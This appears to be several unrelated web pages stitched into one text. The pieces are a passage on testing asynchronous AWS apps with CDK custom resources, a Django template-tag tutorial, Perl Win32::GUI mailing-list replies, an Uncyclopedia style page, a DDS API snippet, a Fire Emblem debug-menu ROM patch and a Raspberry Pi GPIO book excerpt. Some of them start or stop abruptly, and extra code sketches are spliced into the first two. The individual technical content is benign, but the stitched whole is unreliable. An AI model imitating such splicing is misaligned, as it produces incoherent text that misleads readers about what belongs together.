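Neither approach ships a polling helper out of the box, so here is a rough, library-agnostic sketch of the idea: poll against a deadline instead of sleeping a fixed amount. This is my own illustration, not code from aws-testing-library or sls-test-tools; the function name and defaults are invented for the example.

```python
import time

def poll_until(check, interval=0.5, timeout=30.0):
    """Call check() every `interval` seconds until it returns a truthy
    value (which is returned) or `timeout` seconds elapse (TimeoutError)."""
    deadline = time.monotonic() + timeout
    while True:
        result = check()
        if result:
            return result
        if time.monotonic() >= deadline:
            raise TimeoutError("condition not met within %.1fs" % timeout)
        time.sleep(interval)

# Example: a condition that only becomes true on the third check,
# standing in for "the record has appeared in the table".
calls = {"n": 0}

def record_is_ready():
    calls["n"] += 1
    return calls["n"] >= 3

assert poll_until(record_is_ready, interval=0.01) is True
```

The same shape works whether the check queries DynamoDB, reads CloudWatch logs, or hits an API: keep the interval short, bound the total wait, and fail loudly on timeout rather than silently passing.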
To be fair, the solutions given by Sarah and Paul don't preclude polling, but you are on your own to implement it.

## Automatic Rollback

Once we have a really good automation suite, we should wish to connect it to our CI/CD process such that if the tests fail, we roll back the deployment. Assuming we are using AWS and CloudFormation, the only lever we really have to pull there is to attach an alarm to a test suite. This could be achieved by having the test publish custom metrics that trigger the alarm and a potential rollback. This would be yet another permission needed by our test runner role, and it isn't something natively supported by any testing library.

## Custom Resource Provider Framework for Test

This is not the first time I've written about Provider Framework. I think the CDK implementation of CloudFormation Custom Resources is one of the coolest things I've come across recently. I'm constantly impressed by the things I can do with it. Let's examine how it solves some of the problems I've outlined above.

Our tests will be executed by Lambda functions instead of via some external tool. These functions will still need normal IAM roles to access the resources needed to perform the test, but the functions themselves are not accessible to any resource or role external to the account. This means we can run tests in production without risking any data exposure.

We get built-in polling in the isComplete step. This is a Lambda function, executed at queryInterval, that can perform some sort of assertion and then return a boolean value indicating whether the test is complete or we should continue polling.

Provider Framework also has built-in error handling. Throwing any error will pass a "FAILED" response to CloudFormation, which in turn will trigger a rollback.
These advantages are balanced by there not being a good assertion library ready to use in a Lambda function, and by the potential for a poor developer experience if we find ourselves debugging the custom resource itself and having to perform frequent deployments to write a test. I think those problems can be solved with some additional tooling, but nothing exists to date.

## Payment Collections App

So let's see a test in action. The design of this application is that we receive an asynchronous notification from our payment provider indicating whether or not a payment was successful. If the payment was successful, we update our database to indicate that. Otherwise we trigger a collections workflow.

Payment events (success or failure) come to us via EventBridge. Our collections workflow is managed by Step Functions. The record of payment and current status is stored in DynamoDB.

The scenarios we'd like to test are:

- Receive a successful payment event and record it in our table.
- Receive a failed payment event and kick off the collections workflow, run the collection, and record the eventual result in our table.

## Test Event

To write the test, we start with a Lambda function that will initiate the events we want to test. In this case, we're going to send two events to our event bus. Here is a TypeScript function that will do exactly that.
```ts
import EventBridge from 'aws-sdk/clients/eventbridge';
import type { CloudFormationCustomResourceEvent } from 'aws-lambda';

const eb = new EventBridge();

export const handler = async (event: CloudFormationCustomResourceEvent): Promise<void> => {
  if (event.RequestType === 'Delete') {
    return;
  }

  try {
    const { Version } = event.ResourceProperties;
    const events = ['success', 'failure'].map((status) =>
      eb
        .putEvents({
          Entries: [
            {
              EventBusName: process.env.BUS_NAME,
              Source: 'payments',
              DetailType: status,
              Time: new Date(),
              Detail: JSON.stringify({ id: `${Version}-${status}` }),
            },
          ],
        })
        .promise(),
    );
    await Promise.all(events);
  } catch (e) {
    console.error(e);
    throw new Error('Integration Test failed!');
  }
};
```

We're able to take advantage of the CloudFormationCustomResourceEvent type from the @types/aws-lambda package. Because Custom Resources support the full lifecycle of CloudFormation, we need to treat "Delete" as a no-op. We don't want the test to run if the stack is being deleted, as it would obviously fail since the necessary resources won't exist.

The rest of the function simply uses putEvents to propagate two test events, a success and a failure. Note that we are pulling the Version from the Custom Resource and passing that as the event detail.

## Complete Event

The complete event will be called at the interval specified in our code (defaulting to 5 seconds) until it returns a positive result, throws an error, or totalTimeout (default 30 minutes, maximum two hours) elapses.

As before, if this is a stack deletion event, we want the test to just pass, as our business logic shouldn't be under test. If we're undergoing a create or update event, then we'll want to query the database to see if the job is finished yet. We are using the same Version from the original Custom Resource to make sure we can query the same item in the table.
```ts
import { CloudFormationCustomResourceEvent } from 'aws-lambda';
import { PaymentEntity, PaymentStatus } from '../models/payment';

export const handler = async (
  event: CloudFormationCustomResourceEvent,
): Promise<{ Data?: { Result: string }; IsComplete: boolean }> => {
  if (event.RequestType === 'Delete') {
    return { IsComplete: true };
  }

  const { Version } = event.ResourceProperties;

  try {
    // Query the DynamoDB table for both test payments. The test passes once
    // the success payment succeeded and the failure payment has finished
    // the collections workflow (either outcome).
    const successResponse = (await PaymentEntity.get({ id: `${Version}-success` })).Item || {};
    const failureResponse = (await PaymentEntity.get({ id: `${Version}-failure` })).Item || {};

    console.log('Success Response: ', successResponse.status);
    console.log('Failure Response: ', failureResponse.status);

    const IsComplete =
      successResponse.status === PaymentStatus.SUCCESS &&
      [PaymentStatus.COLLECTION_FAILURE, PaymentStatus.COLLECTION_SUCCESS].includes(failureResponse.status);

    return IsComplete
      ? {
          Data: {
            Result: `Payment ${Version}-success finished with status ${successResponse.status} and payment ${Version}-failure finished with status ${failureResponse.status}`,
          },
          IsComplete,
        }
      : { IsComplete };
  } catch (e) {
    console.error(e);
    throw e;
  }
};
```

This function must return an object with IsComplete as a boolean value. If IsComplete is true, then it may also include a Data attribute with a JSON payload. In this case I've defined that as { Result: string }. My intent is to print that string in the console to provide some detail on the test. Note that we lack the convenience of a nice assertion library, but this example is simple enough to get by with imperative code.

## Provider

We need to write a little CDK code to make all this work. In this case, I wrote the entire integration test as a nested stack, which gives it a nice isolation from the actual application.
In addition to just organizing our code and potentially avoiding stack limits, this also lets us hedge our bets a little by making it easy to disable the nested stack in the event of a test failure blocking a critical deployment.

The stack creates the functions and grants the necessary permissions to put events to EventBridge and query DynamoDB. Over the course of the test, we'll see a few events come across EventBridge and also trigger Step Functions. Tests that trigger other asynchronous workflows using SNS or SQS can be done in a similar fashion.

Adding the functions to Provider Framework only takes a few lines of code.

```ts
const intTestProvider = new Provider(stack, 'IntTestProvider', {
  isCompleteHandler,
  logRetention: RetentionDays.ONE_DAY,
  onEventHandler,
  totalTimeout: Duration.minutes(1),
});

this.testResource = new CustomResource(stack, 'IntTestResource', {
  properties: { Version: new Date().getTime().toString() },
  serviceToken: intTestProvider.serviceToken,
});
```

We pass our two handlers to the Provider construct, then create a CustomResource that uses the service token from the Provider. We are also establishing that Version property, which will be the current timestamp in milliseconds as a string. This can serve as a unique key, assuming two tests don't kick off in the same millisecond. If we think that might happen, then using some kind of UUID generator would be more appropriate. It's critical that we include some kind of unique value here, because if we don't, update events will not detect any change and will not run our test!

Finally, the testResource is stored as a member of the IntegrationTestStack so that we can access the output and print it to the console from the main stack.
```ts
new CfnOutput(this, 'IntTestResult', { value: intTestStack.testResource.getAttString('Result') });
```

## Test Run

With all that done, we can now deploy our application as normal, whether that's a cdk deploy from our laptop or something more sophisticated like a CI/CD pipeline.

```
Outputs:
payments-app-stack.IntTestResult = Payment 1631477097557-success finished with status SUCCESS and payment 1631477097557-failure finished with status COLLECTION_FAILURE
```

We can check out the visualization of a few Step Functions runs.

## Bonus: EventBridgeWebSocket

I didn't want to pass up the chance to give a quick look to David Boyne's EventBridgeWebSocket construct. With just a few lines of code, I'm able to actively monitor EventBridge traffic while my test runs!

```ts
new EventBridgeWebSocket(stack, 'sockets', {
  bus: eventBus.eventBusName,
  eventPattern: {
    source: ['payments'],
  },
  stage: 'dev',
});
```

There's really nothing to this. I just have to provide the bus name and an optional pattern. Now, using websocat, I get output like this:

```
% websocat wss://MY_API_ID.execute-api.us-east-1.amazonaws.com/dev
{"version":"0","id":"e8d8989a-c870-85b2-9f56-aa7867701eae","detail-type":"success","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:03Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-success"}}
{"version":"0","id":"34f6d36b-0cda-65e2-9851-194a9c1be01d","detail-type":"failure","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:04Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-failure"}}
{"version":"0","id":"8444d579-c553-4c91-e07a-9de3f9cc17c0","detail-type":"collections","source":"payments","account":"MY_ACCOUNT_ID","time":"2021-09-12T20:22:06Z","region":"us-east-1","resources":[],"detail":{"id":"1631478043585-failure"}}
```

This isn't explicitly a testing tool of course, but it can be of great help when debugging issues, and the cost of entry is amazingly low.
Just make sure you don't implement this in production, at least not without adding an authorizer to the WebSocketApi.

## Infrastructure Testing

Now that we've established Provider Framework as a good basis for testing, are there other applications? Yes! Instead of writing a test against our application, we could use aws-sdk to perform assertions against our infrastructure. This has the same advantages outlined above:

- We don't need external keys to perform these assertions.
- Using addDependency can guarantee the test only runs after the resources are created or updated.
- If the test fails, the deployment will automatically roll back.

It's worth mentioning that AWS CDK already has an RFC for integration testing, so we might end up with something even better. In the meantime, if you are serious about integration testing, it's time to give AWS CDK and Provider Framework a look!

## Next Steps

The weakness of this approach is the imperative coding and the lack of the convenience methods that libraries like aws-testing-library and sls-test-tools offer. It definitely feels a lot more ergonomic to write expect({...}).toHaveLog(expectedLog) than to query a database and try to test properties on the returned item. I'm not sure if a library like jest is really suited to running in Lambda, but there's definitely room for innovation on a better assertion engine here.

That said, I think this approach is strong enough on its own. I've been using just such a test for about three months now and find it to be very reliable and a good way to guarantee quality delivery.

### Discussion (3)

- [[Pingback]] This article was curated as a part of the 25th Issue of Software Testing Notes Newsletter.
- Thanks Pritesh! Looks like you've got lots of great content. I think you'll get some new subscribers when I share with my colleagues.
- hey Matt, thank you for the shoutout.
https://dev.to/aws-builders/testing-the-async-cloud-with-aws-cdk-33aj
# Django tags with parameters

## In the beginning

Some time ago, I struggled and wrestled with a problem that should have been easy: how, in my custom tag, can I parse the parameters passed to me, and know if they're string/int literals, or things I should look up in context?

Now, way back in my Zope days, I had this one beat... I had a little pattern I used... and used... and used... but that was 10 years ago, and a whole different mindset. I hunted about, and finally found someone else had "done it right!™" in their Django app, so I copied them. Then I put it in my own toolbox, gnocchi-tools.

Recently I was trying to help someone who'd run into this exact problem. "Oh", I thought, "I've got this solved!" But it wasn't that easy (because I hadn't written sufficient docs -- mea culpa). So, here's a reference for everyone.

## How It's Done

Everything you need is already in Django. Imagine that :)

### Building

First, during parsing, when your tag function is handed everything and expected to yield a Node, you have to split the contents of the {% %}.

```python
def mytag(parser, token):
    parts = token.split_contents()
    parts.pop(0)
```

Remember that the first 'part' is your tag name. I typically discard this (hence the pop).

Next, you ask the parser to build a 'filter' for each parameter.

```python
    parts = [parser.compile_filter(part) for part in parts]
```

Obviously, not every tag is going to want every parameter resolvable... but it'll suffice for this example.

That's it for the prep work... pass these values to your tag, and the rest happens in your tag render function.

```python
    return MyTag(parts)
```

### Rendering

In your render function, you now need to resolve these filters "in context".

```python
class MyTag(template.Node):
    def __init__(self, parts):
        super(MyTag, self).__init__()
        self.parts = parts

    def render(self, context):
        parts = [part.resolve(context) for part in self.parts]
        ...
```

... and that's it! All of your 'parts' are now resolved and ready to use!
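For intuition, here is a toy, framework-free analogue of what compile_filter()/resolve() buy you: quoted strings and numbers come back as literals, anything else is looked up in the context. This is an illustration of the idea only (my own code, not Django's — the real FilterExpression also handles floats, filters, and variable attribute lookups):

```python
def resolve_param(token, context):
    """Toy stand-in for Django's FilterExpression.resolve():
    quoted strings and ints are literals; anything else is a
    context lookup (None if missing)."""
    # String literal: wrapped in matching quotes
    if len(token) >= 2 and token[0] == token[-1] and token[0] in ('"', "'"):
        return token[1:-1]
    # Int literal
    try:
        return int(token)
    except ValueError:
        pass
    # Otherwise, treat it as a variable name in the context
    return context.get(token)

context = {'user': 'alice'}
assert resolve_param('"hello"', context) == 'hello'
assert resolve_param('42', context) == 42
assert resolve_param('user', context) == 'alice'
```

The point of the pattern above is that Django already does all of this for you: compile_filter() at parse time, resolve() at render time, so your tag never has to guess what kind of parameter it was handed.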
http://musings.tinbrain.net/blog/2011/feb/25/django-tags-parameters/
On 26/09/2007, a9876543210@... <a9876543210@...> wrote:
> I've the problem that my labels are only shown after clicking on them
> or after resizing the window.
> do I have to implement a repainting or something?

No, but you have to process the event queue somewhere in your code. Your example is incomplete, and does not show whether/where you ever call Dialog()/DoEvent()/DoModal(). I suggest you read this if you haven't already:

Regards,
Rob.

> my script:
>
> [snip]
> $cfg_window = Win32::GUI::Window->new(
>     -name        => "configwin",
>     -title       => "$cfg{name} - Configuration",
>     -left        => CW_USEDEFAULT,
>     -size        => [ 600, 450 ],
>     -parent      => $main,
>     -vscroll     => 1,
>     -hscroll     => 1,
>     -helpbutton  => 0,
>     -dialogui    => 1,
>     -resizable   => 1,
>     -onTerminate => sub { do_animation($cfg_window); 0; },
> );
>
> my $ncw = $cfg_window->ScaleWidth();
> my $nch = 20;
>
> $cfg_window->AddButton(
>     -name => "CFGOK",
>     -text => "OK",
>     -pos  => [ 30, $nch ],
> );
> $cfg_window->AddButton(
>     -name => "CFGCANCEL",
>     -text => "CANCEL",
>     -pos  => [ 70, $nch ],
> );
>
> my $count = 0;
> my $padding = 10;
>
> $cfg_window->AddGroupbox(
>     -name  => "CFGX",
>     -title => "Configuration",
>     -left  => 25,
>     -top   => 10,
>     -width => 400,
>     -group => 1,
> );
>
> foreach my $xx (sort(keys %config))
> {
>     $count = $count + 1;
>     $cfg_window->AddTextfield(
>         -name    => "${xx}_name",
>         -text    => "$config{$xx}",
>         -left    => 35,
>         -prompt  => [ "$xx:", 150 ],
>         -height  => 20,
>         -width   => 200,
>         -top     => 25 + ($count * 20),
>         -width   => $cfg_window->CFGX->Width() - (2 * 20),
>         -tabstop => 1,
>     );
> }
>
> $cfg_window->CFGX->Height(350);
> $cfg_window->CFGX->Width(550);
>
> do_animation($cfg_window);
> $cfg_window->SetRedraw(1);
>
> [/snip]
>
> thx
> juergen
>
> _______________________________________________
> Perl-Win32-GUI-Users mailing list
> Perl-Win32-GUI-Users@...

--
Please update your address book with my new email address: rob@...

On 26/09/2007, a9876543210@...
<a9876543210@...> wrote:
> I want to make an input with a dialogbox.
> but I've the problem that the program continues while the dialogbox is
> open.
>
> how can i make the script waiting for closing the dialogbox?

As you haven't posted a *short* and *complete* example of what you are trying to do, I can't really understand what it is that you are asking. I *suspect* that you want something like

$filenameDlg->DoModal();

after your line

$filenameDlg->Show();

I can't be more exact without a complete script to modify. The tutorial in the documents covers this.

regards,
Rob.

> thx
> juergen
>
> my script:
> [snip]
> do_something...
> ask_filename();
> do_the_rest...
>
> sub ask_filename {
>     # Create Find DialogBox
>     my $filenameDlg = new Win32::GUI::DialogBox(
>         -name  => "FileDlg",
>         -title => "Filename",
>         -pos   => [ 150, 150 ],
>         -size  => [ 360, 115 ],
>     );
>
>     # Filename
>     $filenameDlg->AddTextfield (
>         -name    => "FileDlg_Text",
>         -pos     => [10, 12],
>         -size    => [220, 21],
>         -prompt  => [ "Filename: ", 45],
>         -tabstop => 1,
>     );
>
>     $filenameDlg->AddButton (
>         -name    => "FileDlg_OK",
>         -text    => "&OK",
>         -pos     => [270, 10],
>         -size    => [75, 21],
>         -onClick => sub { $filenameDlg->Hide(); $filename = $filenameDlg->FileDlg_Text->Text; return 0; },
>         -group   => 1,
>         -tabstop => 1,
>     );
>
>     # Cancel Button
>     $filenameDlg->AddButton (
>         -name    => "FileDlg_Cancel",
>         -text    => "C&ancel",
>         -pos     => [270, 40],
>         -size    => [75, 21],
>         -onClick => sub { $filenameDlg->Hide(); 0; },
>         -tabstop => 1,
>     );
>     $filenameDlg->FileDlg_Text->SetFocus();
>     $filenameDlg->Show();
>     return 0;
> }
> [/snip]
--
Please update your address book with my new email address: rob@...

On 19/09/2007, Brian Rowlands (Greymouth High School) <RowlandsB@...> wrote:
> I've used TheLoft to create a gui interface for a program I'm writing. A
> button I click is meant to read a selected line from a listview pane and
> display the results in a selection of tf / cb controls:
>
>     # determine which rows have been selected
>     my @selection = $win->lvwFleece->SelectedItems();
>
> 1. @selection contains the index values of the rows selected. However,
> if no rows are selected I was expecting it to return a () array but
> printing its size in such a case shows a value of 1. Why would that be?

Bug, in my opinion. There is similar behaviour throughout the XS code where the return value from subs that are expected to return lists is incorrect for there being no values - the subs return undef rather than the empty list. You'll find the one item in the list is undef.

I'm fixing them as I find them, despite the change being non-backwards compatible, as it's very useful to be able to write:

    # process all selected items
    for ($win->SelectedItems()) {
        process_item($_);
    }

rather than what you have to do now:

    # process all selected items
    for ($win->SelectedItems()) {
        next if not defined $_;
        process_item($_);
    }

or some equivalent.

So long as code handles both empty lists and the undefined value case, then there is no backwards-compatibility issue. Backwards compatibility issues may occur with any code that assumes the list has at least one entry and checks the first value in the list for definedness.

> 2. I really need some better way to determine if the listview has been
> clicked. The event ItemClick(ITEM) in the package description for
> listview looks as though it could be a better option for me.
> Can someone kindly help me to construct the line to determine if the
> listview has had a line selected please? I'm still learning perl and
> I'm puzzled how to do this simple task.

Does this help?

    #!perl -w
    use strict;
    use warnings;

    use Win32::GUI qw();

    my $mw = Win32::GUI::Window->new(
        -title => "ListView - Report Mode",
        -size  => [400,300],
    );

    $mw->AddListView(
        -name        => "LV",
        -width       => $mw->ScaleWidth(),
        -height      => $mw->ScaleHeight(),
        -report      => 1,
        -singlesel   => 1,
        -onItemClick => \&itemSelected,
    );

    for my $col_name ("Title", "Card Number", "Shelf Location") {
        $mw->LV->InsertColumn(
            -text  => $col_name,
            -width => 100,
        );
    }

    $mw->LV->InsertItem(
        -text => [ "Green Eggs and Ham", "JF SEU", "Children's", ],
    );
    $mw->LV->InsertItem(
        -text => [ "A Brief History of the Universe", "897.112", "2nd Floor", ],
    );
    $mw->LV->InsertItem(
        -text => [ "Your Book Title Here", "501.2", "Vault", ],
    );

    $mw->Show();
    Win32::GUI::Dialog();
    exit(0);

    sub itemSelected {
        my ($self, $item) = @_;

        my %info = $self->GetItem($item);
        print qq(Selected: "$info{-text}"\n);

        return 1;
    }
    __END__

Regards,
Rob.

On 06/09/2007, Veli-Pekka Tätilä <vtatila@...> wrote:
> Hi list,
> I think I might have found a bug in the event handling of Radio Buttons,
> or else have just somehow misunderstood how their event handling works.
> Either way, I'd appreciate any comments and clarifications.
>
> Issue:
>
> If I create two radio buttons in a dialog, set them up in the tab order,
> and then use the arrows to select one of the buttons, the onClick event
> is fired twice when the arrows are used to select another radio button.
> In contrast, if I use the mouse or click the button programmatically,
> the event is fired only once. I would have expected the latter behavior
> in keyboard usage, too. What causes the refiring of the onClick event?

I, too, was surprised by this behaviour, but it appears to be 'standard' windows behaviour for radio buttons.
I can't really explain it, but will describe what I see using Spy++:

Using the mouse:
- Mouse down sets the focus to the button and sets the highlight state.
- Mouse up unsets the highlight state and sends a BN_CLICKED message to the parent.

Using the keyboard:
- Key down causes IsDialogMessage to move the focus to the new button (which generates a BN_CLICKED message).
- Key up causes IsDialogMessage to send a BN_CLICK message to the button, which in turn causes the button to send itself WM_LBUTTONDOWN and WM_LBUTTONUP messages (which generates the sequence of events for the mouse click, which in turn generates the second BN_CLICKED).

As I say, I don't really understand the complexity of the message generation, but I am convinced that this is a windows thing and not a Win32::GUI bug. Your click handler needs to cope with multiple clicks anyway, as I can sit there and click the same button again and again ....

Regards,
Rob.

> version info:
>
> This is perl, v5.8.8 built for MSWin32-x86-multi-thread
> Documentation for Win32::GUI v1.05 created 05 Nov 2006
>
> Sample code:
>
> use strict; use warnings;
> use Win32::GUI qw||;
> use Win32::GUI::GridLayout;
>
> my ($width, $height) = qw|4 4|;
> my $win = Win32::GUI::DialogBox->new
> (
>     -name => 'win', -size => [40 * $width, 40 * $height],
>     -text => 'radios', -onTerminate => sub { -1 },
> );
>
> my $grid = Win32::GUI::GridLayout->apply
> (
>     $win, $width, $height,
>     0, 0
> );
>
> my @buttons;
> for my $i (1 .. $width)
> { # Add some radio buttons.
>     my $radio = Win32::GUI::RadioButton->new
>     (
>         $win, -name => "b$i", -tabstop => 1, -text => $i,
>         -onClick => sub
>         {
>             print "Click ", (shift)->UserData() .
"\n"; > 1 > } > ); > $radio->UserData($i); > $grid->add($radio, $i, $height / 2); > push @buttons, $radio; > } # for > my $first =3D $buttons[0]; > $first->SetFocus(); > $first->Click(); > $grid->recalc(); > $win->Show(); > Win32::GUI::Dialog(); > > -- > With kind regards Veli-Pekka T=E4til=E4 (vtatila@...) > Accessibility, game music, synthesizers and programming: > > > ------------------------------------------------------------------------- > This SF.net email is sponsored by: Splunk Inc. > Still grepping through log files to find problems? Stop. > Now Search log events and configuration files using AJAX and a browser. > Download your FREE copy of Splunk now >> > _______________________________________________ > Perl-Win32-GUI-Users mailing list > Perl-Win32-GUI-Users@... > > > --=20 Please update your address book with my new email address: rob@... On 06/09/2007, Veli-Pekka T=E4til=E4 <vtatila@...> wrote: > How good is the Win32::GUI timer for semi realtime applications? Pretty much useless. The underlying mechanism (using the WM_TIMER message) has no guarantees on accuracy, and if the application is processing many messages delivery of WM_TIMER messages takes the lowest priority and will likely happen late. > I've > codedd a drum machine, minus some final tweaks and testing, in Perl > using Win32::GUI as the GUI lib and Win32::MIDI for MIDI. I generate my > own note off events (note on velocity 0) so that Win32::MIDI does not > have to sleep. As I want the ability to operate the GUI while the thing > plays back stuff, I use Win32::GUI::Timer as the heart beat for my step > sequencer. I need the ability to time pretty exactly 32th notes from 50 > to 250 bpm (150 to 30 ms), I expect you'll need a different mechanism. Win32 provides special multimedia timer APIs for this purpose (look up timeSetEvent and the related time* functions in MSDN). > since I want to be able to quantize the > user's input to the closest 16th note (step). 
> I'd also need a pretty
> exact sleep for generating lag for swing, at max one 32nd note and
> possibly much smaller values, too. I'm using Win32::Sleep for the swing,
> at the moment.

Win32::Sleep won't accurately time less than about 50ms (IIRC), especially on older machines.

> Timing seems surprisingly stable and even though I use large amounts of
> objects (each step is one) and hash lookups, Perl's CPU usage shows 0,
> even when playing simultaneously 12 parts at 250 bpm. However, at some
> pretty normal tempo ranges like 130 to 140 BPM, changing the tempo does
> seem to have very little effect. However, if I export the data as MIDI
> at 960 PPQ (I use the MIDI Perl modules for that), the tempo does change.

Right - WM_TIMER messages get delivered when they can - at some point they stop getting delivered any faster ...

Regards,
Rob.

On 16/08/2007, Perl Rob <perlrob@...> wrote:
> Well, I answered my own question, so I thought I'd post the answer
> in case it helps someone else who wants to close a window in this
> manner. Turns out I had to create a quoted word list and add
> WM_CLOSE to it (as a part of my "use Win32::GUI" line):
>
> use Win32::GUI qw( WM_CLOSE );
>
> To be perfectly honest, I don't understand *why* that fixed the
> problem, but it did. I couldn't get any windows to close until I
> did that - now I can close any window (that allows it) by finding
> its handle and sending it the WM_CLOSE message.

That's the syntax for getting Win32::GUI to import constants into the caller's namespace (in fact it's a very common Perl syntax in general). Read the documentation for Win32::GUI::Constants for more information. If you had a 'use warnings;' line, then your earlier attempts would have given you more information about why they were not working.
[As an aside, you shouldn't blindly assume that sending a window a WM_CLOSE will close it - an application is perfectly entitled to catch the WM_CLOSE message and not close the window - for example many programs catch the WM_CLOSE and pop up a dialog asking whether the user really wants to exit (annoying, but it happens) - this is perhaps more useful if the application is reporting that there are unsaved changes and asking if the user wants to save them before exiting.]

Regards,
Rob.

On 10/08/2007, Veli-Pekka Tätilä <vtatila@...> wrote:
> Is there a method I can call to programmatically click a menu item? I'm
> planning on calling it in the Ctrl+N handler in my accelerator table.

Not that I'm aware of.

> I guess I could call the underlying subs that my menu items call, but
> I'd rather have the keyboard control the UI, instead.

In C/C++ you'd create the Accelerator and Menu item with the same ID, and then the OS would do this all automatically for you (both Accelerators and Menu items generate WM_COMMAND messages, with a flag set to indicate which was used, but I don't see a way to utilise this functionality with Win32::GUI).

> It's highly useful
> for push buttons, for instance. As the hotkey pushes the button, the
> user gets visual feedback and also, as a screen reader user, I get
> notified of the focus and button state change accordingly. Is it
> slightly "unorthodox" to click menus in hotkey handlers like that,
> instead of activating the underlying function? As a user I've always
> disliked the fact that nothing visual happens when I save using the hot
> key. So I press Alt+F, S instead, and then the screen reader tells me
> the file menu opens and closes, confirming that something indeed
> happened. Part of my desire to try the programmatic clicking of menu
> items, too, would be to give this kind of visual feedback, even when the
> hotkeys are used.
You could probably code the hotkey handler to post 'alt-f' and 's' keystrokes to the thread's message queue, which might work. Regards, Rob.
https://sourceforge.net/p/perl-win32-gui/mailman/perl-win32-gui-users/?viewmonth=200711&viewday=10
Uncyclopedia:Templates/In-universe/Quotes
From Uncyclopedia, the content-free encyclopedia

The following is a listing of quote templates. The only quote templates still in normal use are {{Q}}, {{cquote}}, and {{Wilde}}. The use of quotes is generally discouraged in most contexts. Quotes are still used in the Unquotable namespace, but that is a relatively small, and mostly abandoned, project. Although many articles still have quotes, it is generally suggested that an article start with a paragraph rather than a quote. Lists of quotes, as with other lists, are discouraged.

Additionally, when quoting someone in text, one should use quotation marks and other standard real-world formatting, rather than breaking paragraphs with the use of {{Q}}. For example, one should type that William Shakespeare said, "Brevity is the soul of wit." One should not use Q and say that:

“Brevity is the soul of wit”

Notice how that introduces an abrupt end to the previous paragraph, and an abrupt start to this one? The flow of ideas is broken, and that is made visually apparent by the nonstandard formatting. There is a reason books are written in paragraph form. Although a comic writer may break the rules of formatting and grammar for humor, it should only be done when it is funny in context.
http://uncyclopedia.wikia.com/wiki/Uncyclopedia:Templates/In-universe/Quotes?direction=next&oldid=5458232
<<cert>> Policy used to name an entity.

#include <dds_c_infrastructure.h>

The purpose of this QoS is to allow the user to attach naming information to created DDS_Entity objects. The name can be at most 255 characters in length. It must be a NULL-terminated string allocated with DDS_String_alloc or DDS_String_dup. If the user provides a non-NULL pointer when getting the QoS, then it should point to valid memory that can be written to, to avoid ungraceful failures.

The actual name string.
[default] "[ENTITY]"
[range] Null-terminated string with length not exceeding 255. Can be NULL.
https://community.rti.com/static/documentation/connext-micro/2.4.1/doc/html/structDDS__EntityNameQosPolicy.html
#include "Extensions/Hack Installation.txt" ORG 0x000AC6 BL(0x01AAE0) //Bls to the debug startup routine ORG 0x5C7368 POIN 0x01A675 //Replacing Suspend's effect with the Debug map menu loading routine ORG 0x5C6728 WORD 0x0 //D.Info's draw routine crashes so the game, so we need to 0 it out The Startup Debug MenuThis one isn't really interesting. option 1 Starts the game normally, option 2 resumes your suspended save, and option 3 doesn't seem to do anything. The Map Debug MenuThis is where the cool stuff is. The first option allows you to switch maps using the left and right buttons. pressing a will start the chapter you selected.The second option is supposed to be Debug Info, but it crashes the game.The third option is supposed to allow you to control the weather, but it doesn't do anything.The Fourth Option is supposed to allow you to switch fog on and off, but it doesn't do anything.The Fifth option controls the number of playthroughs of your save. The Sixth option is called Removed. I think it's pretty straightforward.The Seventh option is blank. moving on.The last option is called Good Night and clicking it leaves the menu. Removed Good Night
http://feuniverse.us/t/fe6u-leftover-debug-stuff/3199
Linux drivers make working with devices so easy - assuming you know how. The most basic of all hardware is the GPIO, and the sysfs way of working with it is now obsolete. Find out what the new way of doing things is all about.

This content comes from my newly published book, Raspberry Pi IoT in C, Second Edition.

As far as IoT goes, the fundamental Linux driver is the GPIO driver, which gives you access to the individual GPIO lines. This is another built-in driver and so is like the LED driver introduced in the previous chapter, but it is a character driver and used in a slightly different way. In most cases, when a device is connected via a set of GPIO lines, you usually use a specific device driver. In this way you can almost ignore the GPIO lines and what they are doing. However, there are still simple situations where a full driver would be overkill. If you want to interface a button or an LED, then direct control over the GPIO lines is the most direct way to do the job, even if there are Linux LED drivers - see the previous chapter - and even an input driver.

Until recently, the standard way to work with GPIO in Linux was to use the sysfs interface. You will see a lot of articles advocating its use and you will encounter many programs making use of it. However, GPIO sysfs was deprecated in Linux 4.8 at the end of 2016 and is due for removal from the kernel in 2020. Of course, it takes time for Linux distributions to make use of the latest kernels.
(This content comes from Raspberry Pi IoT in C, Second Edition, ISBN: 9781871962635.)

The replacement for sysfs is the GPIO character device and, while this looks superficially like the old sysfs interface, it has many major differences. Although it isn't necessary for simple access to the GPIO lines, it is described in this chapter. The new approach to working with GPIO comes pre-installed in the latest version of Pi OS, but it isn't supported in earlier versions.

If you look in the /dev directory you will find files corresponding to each GPIO controller installed. You will see at least:

/dev/gpiochip0

This represents the main GPIO controller and all of the GPIO lines it provides. If you know how sysfs works you might well be expecting instructions on how to read and write to the file from the console. In this case, reading and writing to the file will do you little good, as most of the work is carried out using the input/output control system call, ioctl(), which cannot be used from the command line. The use of ioctl is typical of a character driver, but it does mean that using the GPIO driver is very different from the other file-oriented drivers described later. The next chapter looks at the use of ioctl to directly control the GPIO character device.

If you want to explore the GPIO from the command line, you need to install some tools that have been created mainly as examples of using the new device interface. To do this you need to first install them and the GPIOD library that you will use later:

sudo apt-get install gpiod libgpiod-dev libgpiod-doc

Notice that, if you don't want to use the library to access the driver, you don't have to install it - the GPIO driver is loaded as part of the Linux kernel and is ready to use. The GPIOD library is installed along with the tools discussed at the start of the chapter, but you don't have to use it if you are happy with the ioctl system calls described in the next chapter.
The library splits into two parts, the context-less functions and the lower-level functions, which can be considered context-using. In nearly all cases you will want to use the lower-level functions, as the context-less functions have some serious drawbacks. Let's take a look at each in turn.

To use the library you will need to, if you haven't already done so, install it:

sudo apt-get install gpiod libgpiod-dev libgpiod-doc

You also need to add the headers:

#define _GNU_SOURCE
#include <gpiod.h>

and you will need to load a library file. If you are using VS Code you will need to edit settings.json to load the file:

{
    "sshUser": "pi",
    "sshEndpoint": "192.168.11.170",
    "remoteDirectory": "/home/pi/Documents/${workspaceFolderBasename}",
    "std": "c99",
    "libs": "-lgpiod",
    "header": ""
}

adding "libs":"-lgpiod". By editing the settings.json file in the top level folder, the setting will apply to all of the subfolders. If you don't want this to be the case, you need to look into VS Code Workspaces, which allow you to set individual settings in each folder.

